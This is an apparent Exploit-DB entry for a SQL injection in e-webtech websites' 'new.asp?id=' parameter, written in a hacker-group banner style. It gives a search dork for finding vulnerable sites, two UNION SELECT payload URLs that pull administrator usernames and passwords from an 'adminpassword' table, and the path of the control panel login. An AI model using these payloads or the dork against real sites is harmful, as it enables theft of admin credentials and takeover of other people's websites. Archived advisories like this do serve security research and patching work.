e-webtech - 'new.asp?id=' SQL Injection

EDB-ID:

12547

CVE:

N/A


Author:

protocol

Type:

webapps


Platform:

PHP

Date:

2010-05-10


************************************************************
** (new.asp?id=) SQL Injection Vulnerability
************************************************************
** Home: http://www.dz4all.com/cc | http://www.h4ckforu.com/vb
** Risk: high
** Title: (new.asp?id=) SQL Injection Vulnerability
** Dork: "Powerd by www.e-webtech.com"
************************************************************
** Discovred by: protocol
** From : algeria
** Contact : pre@live.fr
** *********************************************************
** Greet to :
** All Members of http://www.dz4all.com/cc | http://www.h4ckforu.com/vb
** And My ViRuS_Ra3cH & kondamne & komandos & yasMouh & N2N
************************************************************
** Exploit:
**
** http://localhost.com/new.asp?id=1+union+select+0+from+adminpassword
**
**
** Column: username | password & pw
**
**
** Control Panel: http://localhost.com/controlpanel/login.asp
**
** Example:
**
**
** http://server/news.asp?id=412+union+select+1,2,username,pw,5,6,7,8,9,10,11+from+adminpassword
**
**
************************************************************